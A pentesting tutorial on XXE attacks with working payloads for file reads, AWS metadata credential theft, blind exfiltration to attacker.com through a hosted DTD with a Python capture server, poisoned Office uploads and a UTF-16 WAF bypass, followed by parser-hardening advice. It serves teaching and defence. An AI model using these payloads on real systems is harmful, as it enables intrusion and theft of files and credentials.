XXE Attack Tutorial: A Practical Guide for Pentesters

An XML External Entity (XXE) attack is a web security vulnerability that allows an attacker to interfere with an application's processing of XML data. By injecting a malicious external entity into an XML document, you can read local files on the server, interact with internal networks via Server-Side Request Forgery (SSRF), and in rare cases, achieve remote code execution. To exploit this, you must identify an endpoint that parses XML and modify the Document Type Definition (DTD) to point to a sensitive resource or an external server you control.

Understanding the Mechanics of an XXE Attack

XML (Extensible Markup Language) is used everywhere, from SOAP APIs and SAML tokens to Office documents and SVG files. The core of an XXE vulnerability lies in the Document Type Definition (DTD). DTDs allow developers to define the structure of an XML document and use "entities" as variables. Internal entities are plain text substitutions and are mostly harmless (entity-expansion denial of service aside), but external entities tell the XML parser to fetch content from a URI.

When a poorly configured XML parser processes a request containing an external entity, it attempts to resolve the URI. If that URI points to a local file like /etc/passwd, the parser might include the contents of that file in its response. XXE had its own category in the OWASP Top 10 2017 (A4:2017-XML External Entities) and was folded into A05:2021-Security Misconfiguration in the 2021 edition.

Key Takeaway: XXE isn't just about reading files. It's about abusing the trust the XML parser has in the DTD. If the parser allows external entities and provides the output back to the user, you have a direct path to data exfiltration.

Types of XML Entities

Before jumping into exploitation, you need to distinguish between the types of entities you will encounter during a security assessment:

General Entities: Defined within the DTD and used within the XML body (e.g., &myentity;).
Parameter Entities: Only used within the DTD itself and prefixed with a percent sign (e.g., %myentity;). These are crucial for Blind XXE attacks.
External Entities: Use the SYSTEM or PUBLIC keywords to fetch data from an external source (file or URL).
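
To make the distinction concrete, here is a minimal Python sketch that writes out one declaration of each kind and expands the harmless internal one with the standard library's xml.etree.ElementTree. The entity names (greeting, param, ext) are placeholders chosen for illustration.

```python
import xml.etree.ElementTree as ET

# One illustrative declaration per entity type (all names are placeholders).
GENERAL_ENTITY = '<!ENTITY greeting "hello">'                     # used as &greeting; in the body
PARAMETER_ENTITY = '<!ENTITY % param "<!ELEMENT r ANY>">'         # used as %param; inside the DTD
EXTERNAL_ENTITY = '<!ENTITY ext SYSTEM "file:///etc/hostname">'   # content fetched from a URI


def expand_internal_entity() -> str:
    """Parse a document that references an internal general entity."""
    doc = f"<!DOCTYPE r [ {GENERAL_ENTITY} ]><r>&greeting;</r>"
    return ET.fromstring(doc).text


print(expand_internal_entity())
```

Only the internal entity is parsed here. Whether an external declaration like EXTERNAL_ENTITY gets resolved depends entirely on the parser and its configuration, which is exactly what you are probing for during an assessment.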

Identifying XXE Entry Points in Modern Applications

Finding XXE entry points requires more than just looking for .xml files. Many modern applications use XML under the hood without advertising it. I often start my discovery phase by looking for any request that sends structured data to the server. If you see JSON, try changing the Content-Type header to application/xml and sending a basic XML payload. Some frameworks will automatically switch parsers based on the header.
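
The JSON-to-XML switch is easy to script. The sketch below converts a flat JSON body into an equivalent XML document so you can resend it with Content-Type: application/xml. The root element name is an assumption; real frameworks differ in what they expect, so treat it as a starting guess.

```python
import json
import xml.etree.ElementTree as ET


def json_to_xml(json_body: str, root_name: str = "root") -> str:
    """Convert a flat JSON object into an equivalent XML document string."""
    data = json.loads(json_body)
    root = ET.Element(root_name)  # root_name is a guess; adjust per target
    for key, value in data.items():
        child = ET.SubElement(root, key)
        child.text = str(value)
    return ET.tostring(root, encoding="unicode")


print(json_to_xml('{"username": "pentester"}', root_name="user"))
```

If the server answers the XML version the same way it answers the JSON one, the endpoint is parsing XML and is worth testing with a DOCTYPE.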

Common places to find XXE include:

File Uploads: SVG images, DOCX/XLSX files, and PDF generators often use XML parsers.
SAML Assertions: Security Assertion Markup Language (SAML) uses XML for authentication tokens. Modifying these can lead to XXE.
SOAP APIs: By definition, SOAP is XML-based and frequently vulnerable if the underlying library isn't hardened.
RSS Feeds and Sitemaps: Any feature that imports or parses external feeds is a prime candidate.

In my experience, an intercepting proxy such as Burp Suite (see our Burp Suite Tutorial for Pentesters) is the most efficient way to intercept and modify these requests. Look for any application behavior that reflects your input back to the screen after processing an XML-based request.

Step-by-Step XXE Attack Tutorial: Exploiting LFI

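The most common goal of an XXE attack is reading local files, referred to here as Local File Inclusion (LFI), although strictly speaking the parser discloses the file rather than including and executing it. This allows you to read sensitive files like configuration files, source code, or system credentials. Let's look at a practical scenario where a web application accepts a user profile update in XML format.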

1. Identifying the Vulnerable Request

Imagine a request that looks like this:

POST /update-profile HTTP/1.1
Content-Type: application/xml

<user>
    <username>pentester</username>
    <email>[email protected]</email>
</user>

2. Injecting the Malicious DTD

To test for XXE, we insert a DOCTYPE definition before the root element. We define an external entity named xxe and point it to /etc/passwd (on Linux) or C:/windows/win.ini (on Windows).

POST /update-profile HTTP/1.1
Content-Type: application/xml

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<user>
    <username>&xxe;</username>
    <email>[email protected]</email>
</user>
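
If you prefer scripting over a proxy, the same request can be assembled in Python. This is a rough sketch using only the standard library; the target URL in the usage note and the placeholder email address are assumptions, not values from a real application.

```python
import urllib.request


def build_xxe_body(target_uri: str, email: str = "user@example.com") -> str:
    """Return the profile-update document with an external entity in <username>."""
    return (
        '<?xml version="1.0" encoding="UTF-8"?>\n'
        f'<!DOCTYPE test [ <!ENTITY xxe SYSTEM "{target_uri}"> ]>\n'
        "<user>\n"
        "    <username>&xxe;</username>\n"
        f"    <email>{email}</email>\n"  # placeholder address
        "</user>"
    )


def build_request(url: str, target_uri: str) -> urllib.request.Request:
    """Prepare (but do not send) the POST request carrying the payload."""
    return urllib.request.Request(
        url,
        data=build_xxe_body(target_uri).encode("utf-8"),
        headers={"Content-Type": "application/xml"},
        method="POST",
    )
```

Passing the result of build_request("http://target.example/update-profile", "file:///etc/passwd") to urllib.request.urlopen would send it; swapping the second argument for C:/windows/win.ini style paths covers Windows hosts.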

3. Analyzing the Response

If the application is vulnerable, the server will process the entity and replace &xxe; with the contents of the password file. The response might look like this:

HTTP/1.1 200 OK
Content-Type: text/html

<p>Profile updated for user: root:x:0:0:root:/root:/bin/bash...</p>

This confirms the vulnerability. From here, you should follow a Pentest Checklist to systematically map out other sensitive resources you can reach, such as .bash_history, web.xml, or (over http://) cloud metadata endpoints.
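
When you are testing many endpoints, spotting the leak by eye gets tedious. The following sketch searches a response body for text shaped like /etc/passwd entries. The regular expression is my own approximation of the seven-field format, so expect some false negatives on unusual systems.

```python
import re

# Approximate shape of a passwd entry: name:password:uid:gid:gecos:home:shell
PASSWD_RE = re.compile(
    r"[a-z_][a-z0-9_-]*:[^:\s]*:\d+:\d+:[^:\n]*:[^:\n]*:[^:\s<]*"
)


def find_passwd_entries(response_text: str) -> list:
    """Return every substring of the response that looks like a passwd entry."""
    return PASSWD_RE.findall(response_text)


sample = "<p>Profile updated for user: root:x:0:0:root:/root:/bin/bash...</p>"
print(find_passwd_entries(sample))
```

An empty list does not prove the endpoint is safe; it may simply be a blind case where nothing is reflected.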

Exploiting SSRF via XXE

XXE is a powerful gateway to Server-Side Request Forgery (SSRF). Instead of using the file:// protocol, you can use http:// to force the server to make requests to internal resources that are otherwise inaccessible from the internet. This is particularly dangerous in cloud environments like AWS, Azure, or GCP.

For example, to hit the AWS metadata service, you would use the following payload:

<!DOCTYPE test [ <!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/"> ]>

By chaining XXE with SSRF, I've seen red teams gain full control over cloud environments by stealing IAM role credentials. If you want to master this specific pivot, check out this SSRF Vulnerability Example for more advanced scenarios.
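
On AWS the credential theft is usually a two-request flow: the first request lists the role name, the second appends that name to the same path. Here is a small sketch of both payloads. The role name is hypothetical, and the approach assumes the instance still answers IMDSv1 requests, since IMDSv2 requires a session token obtained with a PUT request that an entity fetch cannot issue.

```python
AWS_IMDS = "http://169.254.169.254/latest/meta-data/iam/security-credentials/"


def ssrf_doctype(url: str) -> str:
    """Wrap a URL in the same DOCTYPE shape used for the file read."""
    return f'<!DOCTYPE test [ <!ENTITY xxe SYSTEM "{url}"> ]>'


def imds_steps(role_name: str) -> list:
    """Step 1 lists role names; step 2 requests credentials for one of them."""
    return [ssrf_doctype(AWS_IMDS), ssrf_doctype(AWS_IMDS + role_name)]


for payload in imds_steps("example-role"):  # hypothetical role name
    print(payload)
```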

The URI scheme you put in the entity decides what the parser fetches:

Protocol	Use Case	Example Payload
file://	Reading local system files	file:///etc/hostname
http://	SSRF, internal port scanning	http://192.168.1.1:80
php://filter	Reading source code as Base64 (PHP only)	php://filter/convert.base64-encode/resource=config.php
expect://	Remote Code Execution (PHP with the expect extension loaded)	expect://id
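
The php://filter row returns Base64 rather than readable source, so you need a decoding step. Below is a minimal sketch that pulls the longest Base64-looking run out of a response and decodes it. The 16-character minimum is an arbitrary threshold I picked to skip ordinary words.

```python
import base64
import re

# Runs of Base64 alphabet characters, optionally followed by padding.
B64_RUN = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")


def decode_filter_output(response_text: str) -> str:
    """Find the longest Base64-looking run in a response and decode it."""
    runs = B64_RUN.findall(response_text)
    if not runs:
        raise ValueError("no Base64 run found in response")
    blob = max(runs, key=len)
    return base64.b64decode(blob).decode("utf-8", errors="replace")
```

Encoding the file first is also what keeps characters like < and & in the source code from breaking the XML document the parser is building.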

Blind XXE and Out-of-Band Exfiltration

What if the application parses the XML but doesn't return any output in the response? This is Blind XXE. You can't see the file contents directly, but you can still confirm the vulnerability and exfiltrate data using "Out-of-Band" (OOB) techniques.

Using DNS or HTTP Interaction

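The simplest way to confirm a blind XXE is to trigger a DNS lookup or an HTTP request to a server you control. Burp Collaborator is a common choice for this, but any host where you can watch DNS and HTTP logs works. If a lookup or request for your unique hostname arrives shortly after you send the payload, you know the parser is resolving external entities. Keep in mind that the DNS query often comes from the target's recursive resolver rather than from the target's own IP.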
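
A unique token per probe makes it easy to tie an incoming interaction back to the request that caused it. The sketch below builds a parameter-entity probe, which fires inside the DTD without needing a reference in the XML body. The callback domain is a placeholder for whatever interaction server you use.

```python
import secrets


def make_probe(callback_domain: str) -> tuple:
    """Return (token, payload) where the payload forces a lookup of token.domain."""
    token = secrets.token_hex(8)  # random label to correlate the interaction
    payload = (
        "<!DOCTYPE test [ "
        f'<!ENTITY % probe SYSTEM "http://{token}.{callback_domain}/"> '
        "%probe; ]>"
    )
    return token, payload


def was_triggered(token: str, log_lines: list) -> bool:
    """Check interaction-server log lines for the probe's token."""
    return any(token in line for line in log_lines)
```

Prepend the payload to the XML body you are testing, then feed your DNS or HTTP log lines to was_triggered.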

Advanced OOB Data Exfiltration

To actually read files in a blind scenario, you need to host a malicious DTD on your own server. This DTD will wrap the target file's content into a URL parameter and send it back to you. Here is how I usually set this up:

Step 1: Create a malicious DTD (external.dtd) on your server:

<!ENTITY % file SYSTEM "file:///etc/hostname">
<!ENTITY % eval "<!ENTITY &#x25; exfiltrate SYSTEM 'http://attacker.com/?data=%file;'>">
%eval;
%exfiltrate;

Step 2: Send the XXE payload to the target:

<!DOCTYPE test [
    <!ENTITY % remote SYSTEM "http://attacker.com/external.dtd">
    %remote;
]>

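The target server fetches your DTD, reads the local file, and then makes a second request to your server containing the file's data in the query string. It’s a clever workaround for "silent" parsers. It works best for short, single-line files such as /etc/hostname, because newlines and other characters that are not valid in a URL often make the second request fail.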
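
For the attacker side, a few lines of Python are enough to serve the DTD and capture the callback. This is a bare-bones sketch built on the standard library's http.server; the port and the attacker.com base URL mirror the example above and should be adjusted to your own listener.

```python
from http.server import BaseHTTPRequestHandler, HTTPServer
from typing import Optional
from urllib.parse import parse_qs, urlparse


def render_dtd(callback_base: str, target_file: str) -> str:
    """Build external.dtd for a given callback URL and absolute file path."""
    return (
        f'<!ENTITY % file SYSTEM "file://{target_file}">\n'
        f'<!ENTITY % eval "<!ENTITY &#x25; exfiltrate SYSTEM \'{callback_base}/?data=%file;\'>">\n'
        "%eval;\n"
        "%exfiltrate;\n"
    )


def extract_exfil(path: str) -> Optional[str]:
    """Pull the data parameter out of a request path, if present."""
    values = parse_qs(urlparse(path).query).get("data")
    return values[0] if values else None


class ExfilHandler(BaseHTTPRequestHandler):
    dtd = render_dtd("http://attacker.com", "/etc/hostname")

    def do_GET(self):
        if self.path.startswith("/external.dtd"):
            body = self.dtd.encode("utf-8")  # first request: hand out the DTD
        else:
            leaked = extract_exfil(self.path)  # second request: the callback
            if leaked is not None:
                print(f"exfiltrated: {leaked!r}")
            body = b""
        self.send_response(200)
        self.send_header("Content-Type", "application/xml-dtd")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)


def serve(port: int = 8000) -> None:
    """Block and serve until interrupted."""
    HTTPServer(("0.0.0.0", port), ExfilHandler).serve_forever()
```

Calling serve() starts the listener; the Step 2 payload then needs to point at that host and port.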

Advanced XXE Scenarios: XInclude and Error-Based

Sometimes, you cannot control the DOCTYPE declaration because the application inserts your input into a pre-defined XML template. This is where XInclude becomes your best friend. XInclude is a separate W3C specification that lets a parser build a larger XML document from smaller chunks, and it only works if the parser has XInclude processing enabled.

If you can only control a single value inside an XML element, try this:

<user>
    <username>
        <foo xmlns:xi="http://www.w3.org/2001/XInclude">
            <xi:include parse="text" href="file:///etc/passwd"/>
        </foo>
    </username>
</user>
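
To see why this works where a DOCTYPE cannot, it helps to simulate the server-side template. In the sketch below, TEMPLATE is a hypothetical stand-in for whatever the application builds around your value; the point is that the injected fragment leaves the final document well-formed.

```python
import xml.etree.ElementTree as ET

XI_NS = "http://www.w3.org/2001/XInclude"
# Hypothetical server-side template; the attacker only controls {value}.
TEMPLATE = "<user><username>{value}</username></user>"


def xinclude_fragment(href: str) -> str:
    """Build the XInclude element that is submitted as the field value."""
    return (
        f'<foo xmlns:xi="{XI_NS}">'
        f'<xi:include parse="text" href="{href}"/>'
        "</foo>"
    )


def render(value: str) -> ET.Element:
    """Mimic the application: drop the value into the template and parse it."""
    return ET.fromstring(TEMPLATE.format(value=value))


doc = render(xinclude_fragment("file:///etc/passwd"))
print(ET.tostring(doc, encoding="unicode"))
```

ElementTree does not process the include on its own, so this only shows the document shape. A target parser with XInclude enabled would replace the xi:include element with the file's text.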

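Another technique is Error-Based XXE. If the application suppresses direct output but displays verbose error messages, you can craft a DTD that triggers a parsing error containing the contents of the file you want to read. This is often faster than OOB exfiltration because the data comes back in the HTTP response instead of over a second channel. Keep in mind that the usual payload still has to be loaded as an external DTD (or built on a DTD file that already exists on the target), because most parsers reject parameter entity references inside declarations in the internal subset.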
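
A commonly used error-based DTD points a second entity at a path that cannot exist and embeds the file contents in that path, so the "file not found" error echoes the data. The sketch below generates that DTD and extracts the leak from an error message. The /nonexistent/ marker is arbitrary, and the exact error wording varies by parser, so leak_from_error only assumes the marker shows up somewhere in the message.

```python
from typing import Optional

MARKER = "/nonexistent/"  # arbitrary path prefix that should never exist


def error_based_dtd(target_file: str) -> str:
    """Build a DTD whose final entity fails with the file contents in its path."""
    return (
        f'<!ENTITY % file SYSTEM "file://{target_file}">\n'
        "<!ENTITY % eval \"<!ENTITY &#x25; error SYSTEM 'file://"
        + MARKER
        + "%file;'>\">\n"
        "%eval;\n"
        "%error;\n"
    )


def leak_from_error(message: str) -> Optional[str]:
    """Return whatever follows the marker in an error message, if present."""
    _, found, tail = message.partition(MARKER)
    return tail if found else None
```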

Expert Tip: When testing for XXE in file uploads, don't forget about XLSX or DOCX files. These are essentially ZIP archives full of XML files. Unzip the document, inject your XXE payload into xl/workbook.xml (XLSX) or word/document.xml (DOCX), re-zip it, and upload. I've caught many "secure" enterprise apps this way.
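
The unzip, inject, re-zip cycle can be automated with Python's zipfile module. This is a minimal sketch that works on bytes in memory; it assumes the member is UTF-8 encoded and places the DOCTYPE right after the XML declaration.

```python
import io
import zipfile


def inject_doctype(xml_bytes: bytes, doctype: str) -> bytes:
    """Place a DOCTYPE right after the XML declaration (or at the very start)."""
    text = xml_bytes.decode("utf-8-sig")  # also tolerates a UTF-8 BOM
    if text.startswith("<?xml"):
        end = text.index("?>") + 2
        return (text[:end] + doctype + text[end:]).encode("utf-8")
    return (doctype + text).encode("utf-8")


def poison_ooxml(archive: bytes, member: str, doctype: str) -> bytes:
    """Copy an OOXML archive, injecting the DOCTYPE into a single member."""
    out = io.BytesIO()
    with zipfile.ZipFile(io.BytesIO(archive)) as src, \
            zipfile.ZipFile(out, "w", zipfile.ZIP_DEFLATED) as dst:
        for info in src.infolist():
            data = src.read(info.filename)
            if info.filename == member:
                data = inject_doctype(data, doctype)
            dst.writestr(info, data)  # keep the original name and metadata
    return out.getvalue()
```

A typical call reads the original file with open(path, "rb"), passes "word/document.xml" or "xl/workbook.xml" as the member, and writes the returned bytes to a new file for upload. A parameter-entity DOCTYPE is the safer choice here, since you rarely see the parsed document reflected back.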

How to Prevent XXE Vulnerabilities in Production

Fixing XXE isn't about sanitizing input strings; it's about configuring the XML parser correctly. The most effective defense is to completely disable DTDs (Document Type Definitions) or at least disable the support for external entities and external DTDs.

As a developer or AppSec engineer, you should consult the OWASP XXE Prevention Cheat Sheet for your specific language. Here is a quick reference for common environments:

Java: Use factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
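PHP: On versions before 8.0, call libxml_disable_entity_loader(true);. The function is deprecated as of PHP 8.0 because libxml 2.9.0 and later no longer load external entities by default. On any version, avoid passing LIBXML_NOENT or LIBXML_DTDLOAD when parsing untrusted XML.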
Python (lxml): Use resolve_entities=False when initializing the parser.
.NET: Set XmlResolver to null and DtdProcessing to DtdProcessing.Prohibit in XmlReaderSettings.
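
The "disable DTDs completely" approach can be illustrated with Python's standard library alone. The sketch below mirrors the intent of Java's disallow-doctype-decl feature by rejecting any document that declares a DOCTYPE before it reaches the real parser. The names safe_fromstring and DoctypeForbidden are my own, and the document is parsed twice, so treat this as an illustration rather than a drop-in hardening library.

```python
import xml.etree.ElementTree as ET
from xml.parsers import expat


class DoctypeForbidden(ValueError):
    """Raised when untrusted XML contains a DOCTYPE declaration."""


def _reject_doctype(name, sysid, pubid, has_internal_subset):
    raise DoctypeForbidden(f"DOCTYPE '{name}' is not allowed")


def safe_fromstring(data: bytes) -> ET.Element:
    """Parse XML only if it declares no DOCTYPE at all."""
    scanner = expat.ParserCreate()
    scanner.StartDoctypeDeclHandler = _reject_doctype  # fires on <!DOCTYPE ...>
    scanner.Parse(data, True)  # first pass: scan for a DOCTYPE
    return ET.fromstring(data)  # second pass: build the tree
```

Without a DOCTYPE there is nowhere to declare an entity, so external entities, parameter entities, and entity-expansion attacks are all refused in one step.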

Beyond code fixes, implementing a Web Application Firewall (WAF) can help detect common XXE patterns, but it should never be your only line of defense. A determined attacker can often bypass WAFs using different encodings (like UTF-16) that the WAF might not inspect properly. For a broader look at application defense, refer to our Web Application Security Testing Guide.
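
The encoding trick is simple to demonstrate. In this sketch the payload is re-encoded as UTF-16, after which the byte sequence for <!ENTITY no longer appears in the request body even though an XML parser reads the same document. Whether a given WAF misses it depends on the product, so this only shows why naive byte matching fails.

```python
def to_utf16(payload: str) -> bytes:
    """Re-encode an XML payload as UTF-16 and update its declaration to match."""
    declared = payload.replace('encoding="UTF-8"', 'encoding="UTF-16"')
    return declared.encode("utf-16")  # Python prepends a byte order mark


payload = (
    '<?xml version="1.0" encoding="UTF-8"?>'
    '<!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>'
    "<user><username>&xxe;</username></user>"
)
raw = to_utf16(payload)
print(b"<!ENTITY" in raw)                 # ASCII pattern match on the raw bytes
print("<!ENTITY" in raw.decode("utf-16"))  # same check after proper decoding
```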

Summary of XXE Impact

The impact of XXE ranges from low to critical depending on the environment. In a standard web app, it usually results in high-severity LFI. In a cloud-native microservices architecture, it can lead to a full cluster compromise via SSRF against the metadata service or internal Kubelet APIs.

If you are just starting out in security research, XXE is one of the most rewarding vulnerabilities to master. It requires a solid understanding of how data flows through an application and how different protocols interact. For more hands-on practice, I highly recommend checking out OWASP Top 10 Explained to see how XXE fits into the larger threat landscape.

Frequently Asked Questions

What is the difference between XXE and XEE?

XEE (XML Entity Expansion) usually refers to "Billion Laughs" style DoS attacks where entities are nested to consume memory. XXE (XML External Entity) specifically refers to using the SYSTEM keyword to access external URI resources like files or network paths.
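
The arithmetic behind the name is worth seeing once. In the classic payload, a three-byte entity is referenced ten times by the next entity, and that nesting is repeated nine times. A quick sketch of the resulting size:

```python
def expanded_size(base_len: int, fanout: int, depth: int) -> int:
    """Bytes produced when an entity of base_len is nested depth times with fanout references."""
    return base_len * fanout ** depth


# "lol" is 3 bytes; 9 levels of 10 references each yields a billion copies.
print(expanded_size(3, 10, 9))
```

That is roughly 3 GB of text from a payload smaller than a kilobyte, which is why entity expansion limits matter even when external entities are disabled.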

Can XXE lead to Remote Code Execution (RCE)?

Yes, but it's rare. RCE via XXE typically happens if the PHP expect module is loaded and enabled, or if you can use XXE to upload a malicious file and then trigger it, or by reaching an internal management API via SSRF.

How do I test for XXE if the server blocks the file:// protocol?

Try using other protocols like http:// for SSRF, php://filter (PHP only) to encode content in Base64, or netdoc:// on older Java runtimes. Sometimes wrappers like gopher:// can also be used to bypass basic filters, although many modern runtimes have dropped support for them.

Is XXE still relevant in 2024?

Absolutely. While many modern frameworks have disabled external entity resolution by default, legacy systems, complex enterprise integrations, and niche file format parsers (like those for CAD files or specialized medical data) remain frequently vulnerable.

Related Vulnerabilities & Techniques

CWE-918: Server-Side Request Forgery (SSRF)
CWE-611: XML External Entity (XXE)
CWE-22: Path Traversal
T1046: Network Service Discovery
T1190: Exploit Public-Facing Application

White Hats Nepal Team

Security researchers and penetration testers sharing real-world vulnerability research, exploitation techniques, and defense strategies.